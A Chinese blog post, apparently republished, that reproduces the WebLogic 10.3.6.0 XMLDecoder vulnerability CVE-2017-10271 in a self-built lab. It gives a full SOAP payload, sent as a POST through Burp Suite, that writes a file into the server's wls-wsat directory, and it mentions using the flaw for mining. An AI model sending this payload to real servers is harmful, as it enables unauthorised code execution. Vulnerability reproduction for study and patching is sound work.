码迷,mamicode.com
首页 > Web开发 > 详细

关于weblogic 10.3.6.0 的漏洞复现(1)

时间:2018-05-08 14:29:26      阅读:418      评论:0      收藏:0      [点我收藏+]

标签:注意   sch   http   技术分享   oid   分享图片   nal   图片   coder   

最近小R 搭建了个weblogic,  因为之前在公司找系统漏洞的时候,发现了这个漏洞,所以为了特地专门搭建了个10.3.6.0版本。

漏洞编号: CVE-2017-10271

漏洞的描述:就是weblogic 的WLS组件中存在了CVE-2017-10271远程代码的执行漏洞,可以构造请求运行weblogic中间件的主机来进行攻击。此外,还可以利用此漏洞来进行挖矿。

1. 环境就自己去官网搭建吧。  要10.3.6.0这个版本哦

2. 目前发现就是这个页面存在漏洞。技术分享图片

3. 通过Burpsuite来抓包,然后修改数据

抓的包是GET请求,注意:需要改为POST,然后在代码后面加入

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.6.0" class="java.beans.XMLDecoder">
<object class="java.io.PrintWriter">
<string>servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/R.Hacker</string><void method="println">
<string>xmldecoder_vul_test</string></void><void method="close"/>
</object>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

 

 发一下我改的:

 

技术分享图片

 

 实验成功,成功写入代码!

技术分享图片

 

 这只是一个简单的案例。 后续会陆续更新哈

关于weblogic 10.3.6.0 的漏洞复现(1)

标签:注意   sch   http   技术分享   oid   分享图片   nal   图片   coder   

原文地址:https://www.cnblogs.com/R-Hacker/p/9007438.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!